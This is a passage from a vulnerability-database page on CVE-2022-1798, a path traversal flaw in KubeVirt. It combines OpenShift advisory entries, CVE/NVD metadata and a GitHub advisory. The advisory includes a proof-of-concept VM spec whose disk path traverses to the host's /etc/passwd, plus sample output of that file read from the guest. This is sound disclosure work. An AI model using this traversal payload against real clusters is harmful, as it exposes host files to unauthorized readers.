"text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen."
}
],
"product_status": {
"known_affected": [
"T028132",
"67646",
"T025202",
"T028416",
"T026435",
"T028205",
"T025990",
"T027760"
]
},
"release_date": "2023-01-25T23:00:00Z",
"title": "CVE-2021-44717"
},
{
"cve": "CVE-2022-1705",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen."
}
],
"product_status": {
"known_affected": [
"T028132",
"67646",
"T025202",
"T028416",
"T026435",
"T028205",
"T025990",
"T027760"
]
},
"release_date": "2023-01-25T23:00:00Z",
"title": "CVE-2022-1705"
},
{
"cve": "CVE-2022-1798",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen."
}
],
"product_status": {
"known_affected": [
"T028132",
"67646",
"T025202",
"T028416",
"T026435",
"T028205",
"T025990",
"T027760"
]
},
"release_date": "2023-01-25T23:00:00Z",
"title": "CVE-2022-1798"
},
{
"cve": "CVE-2022-1962",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen."
}
],
"product_status": {
"known_affected": [
"T028132",
"67646",
"T025202",
"T028416",
"T026435",
"T028205",
"T025990",
"T027760"
]
},
"release_date": "2023-01-25T23:00:00Z",
"title": "CVE-2022-1962"
},
{
"cve": "CVE-2022-23772",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen."
}
],
"product_status": {
"known_affected": [
"T028132",
"67646",
"T025202",
"T028416",
"T026435",
"T028205",
"T025990",
"T027760"
]
},
"release_date": "2023-01-25T23:00:00Z",
"title": "CVE-2022-23772"
},
{
"cve": "CVE-2022-23773",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen."
}
],
"product_status": {
"known_affected": [
"T028132",
"67646",
"T025202",
"T028416",
"T026435",
"T028205",
"T025990",
"T027760"
]
},
"release_date": "2023-01-25T23:00:00Z",
"title": "CVE-2022-23773"
},
{
"cve": "CVE-2022-23806",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen."
}
],
"product_status": {
"known_affected": [
"T028132",
"67646",
"T025202",
"T028416",
"T026435",
"T028205",
"T025990",
"T027760"
]
},
"release_date": "2023-01-25T23:00:00Z",
"title": "CVE-2022-23806"
},
{
"cve": "CVE-2022-28131",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen."
}
],
"product_status": {
"known_affected": [
"T028132",
"67646",
"T025202",
"T028416",
"T026435",
"T028205",
"T025990",
"T027760"
]
},
"release_date": "2023-01-25T23:00:00Z",
"title": "CVE-2022-28131"
},
{
"cve": "CVE-2022-29526",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen."
}
],
"product_status": {
"known_affected": [
"T028132",
"67646",
"T025202",
"T028416",
"T026435",
"T028205",
"T025990",
"T027760"
]
},
"release_date": "2023-01-25T23:00:00Z",
"title": "CVE-2022-29526"
},
{
"cve": "CVE-2022-30629",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen."
}
],
"product_status": {
"known_affected": [
"T028132",
"67646",
"T025202",
"T028416",
"T026435",
"T028205",
"T025990",
"T027760"
]
},
"release_date": "2023-01-25T23:00:00Z",
"title": "CVE-2022-30629"
},
{
"cve": "CVE-2022-30630",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen."
}
],
"product_status": {
"known_affected": [
"T028132",
"67646",
"T025202",
"T028416",
"T026435",
"T028205",
"T025990",
"T027760"
]
},
"release_date": "2023-01-25T23:00:00Z",
"title": "CVE-2022-30630"
},
{
"cve": "CVE-2022-30631",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen."
}
],
"product_status": {
"known_affected": [
"T028132",
"67646",
"T025202",
"T028416",
"T026435",
"T028205",
"T025990",
"T027760"
]
},
"release_date": "2023-01-25T23:00:00Z",
"title": "CVE-2022-30631"
},
{
"cve": "CVE-2022-30632",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen."
}
],
"product_status": {
"known_affected": [
"T028132",
"67646",
"T025202",
"T028416",
"T026435",
"T028205",
"T025990",
"T027760"
]
},
"release_date": "2023-01-25T23:00:00Z",
"title": "CVE-2022-30632"
},
{
"cve": "CVE-2022-30633",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen."
}
],
"product_status": {
"known_affected": [
"T028132",
"67646",
"T025202",
"T028416",
"T026435",
"T028205",
"T025990",
"T027760"
]
},
"release_date": "2023-01-25T23:00:00Z",
"title": "CVE-2022-30633"
},
{
"cve": "CVE-2022-30635",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen."
}
],
"product_status": {
"known_affected": [
"T028132",
"67646",
"T025202",
"T028416",
"T026435",
"T028205",
"T025990",
"T027760"
]
},
"release_date": "2023-01-25T23:00:00Z",
"title": "CVE-2022-30635"
},
{
"cve": "CVE-2022-32148",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift existieren mehrere Schwachstellen. Diese bestehen in den Modulen \"Golang\" und \"kubeVirt\". Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Programmcode auszuf\u00fchren, Dateien zu manipulieren, einen Denial of Service Zustand herbeizuf\u00fchren oder Sicherheitsvorkehrungen zu umgehen."
}
],
"product_status": {
"known_affected": [
"T028132",
"67646",
"T025202",
"T028416",
"T026435",
"T028205",
"T025990",
"T027760"
]
},
"release_date": "2023-01-25T23:00:00Z",
"title": "CVE-2022-32148"
}
]
}
gsd-2022-1798
Vulnerability from gsd
Modified
2023-12-13 01:19
Details
A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/<> is not accessible.
Aliases
Aliases
{
"GSD": {
"alias": "CVE-2022-1798",
"description": "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible.",
"id": "GSD-2022-1798",
"references": [
"https://www.suse.com/security/cve/CVE-2022-1798.html",
"https://access.redhat.com/errata/RHSA-2022:6351",
"https://access.redhat.com/errata/RHSA-2022:6526",
"https://access.redhat.com/errata/RHSA-2022:6681",
"https://access.redhat.com/errata/RHSA-2022:6890",
"https://access.redhat.com/errata/RHSA-2023:0408"
]
},
"gsd": {
"metadata": {
"exploitCode": "unknown",
"remediation": "unknown",
"reportConfidence": "confirmed",
"type": "vulnerability"
},
"osvSchema": {
"aliases": [
"CVE-2022-1798"
],
"details": "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible.",
"id": "GSD-2022-1798",
"modified": "2023-12-13T01:19:28.118584Z",
"schema_version": "1.4.0"
}
},
"namespaces": {
"cve.org": {
"CVE_data_meta": {
"ASSIGNER": "security@google.com",
"ID": "CVE-2022-1798",
"STATE": "PUBLIC",
"TITLE": "Path Traversal vulnerability in Kubevirt"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Kubevirt",
"version": {
"version_data": [
{
"platform": "all",
"version_affected": "\u003c",
"version_value": "0.55.1"
},
{
"platform": "all",
"version_affected": "\u003c",
"version_value": "0.56.0"
}
]
}
}
]
},
"vendor_name": "Google LLC"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Oliver Brooks and James Klopchic of NCC Group"
},
{
"lang": "eng",
"value": "Diane Dubois and Roman Mohr of Google"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible."
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-20 Improper Input Validation"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364",
"refsource": "CONFIRM",
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364"
}
]
},
"source": {
"discovery": "EXTERNAL"
}
},
"gitlab.com": {
"advisories": [
{
"affected_range": "\u003e=0.20.0 \u003c0.55.1",
"affected_versions": "All versions starting from 0.20.0 before 0.55.1",
"cvss_v3": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"cwe_ids": [
"CWE-1035",
"CWE-22",
"CWE-937"
],
"date": "2022-09-19",
"description": "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible.",
"fixed_versions": [
"0.55.1"
],
"identifier": "CVE-2022-1798",
"identifiers": [
"CVE-2022-1798",
"GHSA-qv98-3369-g364"
],
"not_impacted": "",
"package_slug": "go/github.com/kubevirt/kubevirt",
"pubdate": "2022-09-15",
"solution": "Upgrade to version 0.55.1 or above.",
"title": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-1798",
"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364"
],
"uuid": "53248d19-699a-448b-8098-ab304adcac1a"
},
{
"affected_range": "\u003c=0.53",
"affected_versions": "All versions up to 0.53",
"cwe_ids": [
"CWE-1035",
"CWE-352",
"CWE-937"
],
"date": "2022-08-18",
"description": "Relative Path Traversal in kubevirt.io/kubevirt.",
"fixed_versions": [],
"identifier": "GMS-2022-3668",
"identifiers": [
"GHSA-cvx8-ppmc-78hm",
"GMS-2022-3668",
"CVE-2022-1798"
],
"not_impacted": "",
"package_slug": "go/kubevirt.io/kubevirt",
"pubdate": "2022-08-18",
"solution": "Unfortunately, there is no solution available yet.",
"title": "Relative Path Traversal",
"urls": [
"https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm",
"https://github.com/advisories/GHSA-cvx8-ppmc-78hm"
],
"uuid": "815806e6-b8e2-4abd-8822-0be903839c27"
}
]
},
"nvd.nist.gov": {
"configurations": {
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*",
"cpe_name": [],
"versionEndExcluding": "0.55.1",
"versionStartIncluding": "0.20.0",
"vulnerable": true
}
],
"operator": "OR"
}
]
},
"cve": {
"CVE_data_meta": {
"ASSIGNER": "security@google.com",
"ID": "CVE-2022-1798"
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "en",
"value": "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364",
"refsource": "CONFIRM",
"tags": [
"Exploit",
"Mitigation",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364"
}
]
}
},
"impact": {
"baseMetricV3": {
"cvssV3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.0,
"impactScore": 4.0
}
},
"lastModifiedDate": "2022-09-19T18:52Z",
"publishedDate": "2022-09-15T16:15Z"
}
}
}
ghsa-cvx8-ppmc-78hm
Vulnerability from github
Published
2022-08-18 19:02
Modified
2022-09-30 00:44
Severity ?
Summary
Duplicate Advisory: KubeVirt arbitrary host file read from the VM
Details
Duplicate Advisory
This advisory is a duplicate of GHSA-qv98-3369-g364. This link is maintained to preserve external references.
Original Description
Summary As part of a Kubevirt audit performed by NCC group, a finding dealing with systemic lack of path sanitization which leads to a path traversal was identified. Google tested the exploitability of the paths in the audit report and identified that when combined with another vulnerability one of the paths leads to an arbitrary file read on the host from the VM.
The read operations are limited to files which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/<> is not accessible.
Severity
Moderate - The vulnerability is proven to exist in an open source version of KubeVirt by NCC Group while being combined with Systemic Lack of Path Sanitization, which leads to Path traversal.
Proof of Concept
The initial VMI specifications can be written as such to reproduce the issue:
```
apiVersion: kubevirt.io/v1 kind: VirtualMachineInstance metadata: name: vmi-fedora spec: domain: devices: disks: - disk: bus: virtio name: containerdisk - disk: bus: virtio name: cloudinitdisk - disk: bus: virtio name: containerdisk1 rng: {} resources: requests: memory: 1024M terminationGracePeriodSeconds: 0 volumes: - containerDisk: image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0 name: containerdisk - containerDisk: image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0 path: test3/../../../../../../../../etc/passwd name: containerdisk1 - cloudInitNoCloud: userData: | #!/bin/sh echo 'just something to make cirros happy' name: cloudinitdisk
``` The VMI can then be started through kubectl apply -f vm-test-ncc.yaml. The requested file is accessible once the VM is up and can be accessed under /dev/vdc.
Depending on the environment, path may contain more or less /.., something that can easily be tested by checking the events until the VMI can start without failure. Restrictions
SELinux may mitigate this vulnerability.
When using a node with selinux, selinux denies the access and the VM start was aborted:
```
19s Warning SyncFailed virtualmachineinstance/vmi-fedora server error. command SyncVMI failed: "preparing ephemeral container disk images failed: stat /var/run/kubevirt/container-disks/disk_0.img: permission denied"
type=AVC msg=audit(1651828898.296:1266): avc: denied { setattr } for pid=44402 comm="rpc-worker" name="passwd" dev="vda1" ino=691477 scontext=system_u:system_r:virt_launcher.process:s0:c255,c849 tcontext=system_u:object_r:passwd_file_t:s0 tclass=file permissive=1
```
After making selinux permissive the VM can boot and access /etc/passwd from the node within the guest:
```
$ sudo cat /dev/vdc root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin [...]
```
Further Analysis In order to mitigate this vulnerability, Sanitize imagePath in pkg/container-disk/container-disk.go following ISE best practices described and Add checks in pkg/virt-api/webhooks/validating-webhook/admitters/vmi-create-admitter.go
Timeline Date reported: 05/10/2022 Date fixed: N/A Date disclosed: 08/08/2022
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "kubevirt.io/kubevirt"
},
"ranges": [
{
"events": [
{
"introduced": "0.20.0"
},
{
"fixed": "0.55.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-1798"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2022-08-18T19:02:18Z",
"nvd_published_at": "2022-09-15T16:15:00Z",
"severity": "MODERATE"
},
"details": "## Duplicate Advisory\nThis advisory is a duplicate of [GHSA-qv98-3369-g364](https://github.com/advisories/GHSA-qv98-3369-g364). This link is maintained to preserve external references.\n\n## Original Description\n\n**Summary**\nAs part of a Kubevirt audit performed by NCC group, a finding dealing with systemic lack of path sanitization which leads to a path traversal was identified. Google tested the exploitability of the paths in the audit report and identified that when combined with another vulnerability one of the paths leads to an arbitrary file read on the host from the VM.\n\nThe read operations are limited to files which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible.\n\n**Severity**\n\nModerate - The vulnerability is proven to exist in an open source version of KubeVirt by NCC Group while being combined with Systemic Lack of Path Sanitization, which leads to Path traversal.\n\n**Proof of Concept**\n\nThe initial VMI specifications can be written as such to reproduce the issue:\n\n```\n\napiVersion: kubevirt.io/v1\nkind: VirtualMachineInstance\nmetadata:\n name: vmi-fedora\nspec:\n domain:\n devices:\n disks:\n - disk:\n bus: virtio\n name: containerdisk\n - disk:\n bus: virtio\n name: cloudinitdisk\n - disk:\n bus: virtio\n name: containerdisk1\n rng: {}\n resources:\n requests:\n memory: 1024M\n terminationGracePeriodSeconds: 0\n volumes:\n - containerDisk:\n image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0\n name: containerdisk\n - containerDisk:\n image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0\n path: test3/../../../../../../../../etc/passwd\n name: containerdisk1\n - cloudInitNoCloud:\n userData: |\n #!/bin/sh\n echo \u0027just something to make cirros happy\u0027\n name: cloudinitdisk\n\n\n```\nThe VMI can then be started through kubectl apply -f vm-test-ncc.yaml.\nThe requested file is accessible once the VM is up and can be accessed under /dev/vdc.\n\nDepending on the environment, path may contain more or less /.., something that can easily be tested by checking the events until the VMI can start without failure.\nRestrictions \n\nSELinux may mitigate this vulnerability.\n\nWhen using a node with selinux, selinux denies the access and the VM start was aborted:\n\n```\n\n19s Warning SyncFailed virtualmachineinstance/vmi-fedora server error. command SyncVMI failed: \"preparing ephemeral container disk images failed: stat /var/run/kubevirt/container-disks/disk_0.img: permission denied\"\n\ntype=AVC msg=audit(1651828898.296:1266): avc: denied { setattr } for pid=44402 comm=\"rpc-worker\" name=\"passwd\" dev=\"vda1\" ino=691477 scontext=system_u:system_r:virt_launcher.process:s0:c255,c849 tcontext=system_u:object_r:passwd_file_t:s0 tclass=file permissive=1\n\n```\n\nAfter making selinux permissive the VM can boot and access /etc/passwd from the node within the guest:\n\n```\n\n$ sudo cat /dev/vdc\nroot:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\n[...]\n\n```\n\n**Further Analysis**\nIn order to mitigate this vulnerability, Sanitize imagePath in pkg/container-disk/container-disk.go following ISE best practices described and Add checks in pkg/virt-api/webhooks/validating-webhook/admitters/vmi-create-admitter.go\n\n**Timeline**\nDate reported: 05/10/2022\nDate fixed: N/A\nDate disclosed: 08/08/2022",
"id": "GHSA-cvx8-ppmc-78hm",
"modified": "2022-09-30T00:44:46Z",
"published": "2022-08-18T19:02:18Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm"
},
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1798"
},
{
"type": "PACKAGE",
"url": "https://github.com/kubevirt/kubevirt"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Duplicate Advisory: KubeVirt arbitrary host file read from the VM",
"withdrawn": "2022-09-30T00:44:46Z"
}
Loading...
Loading...
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.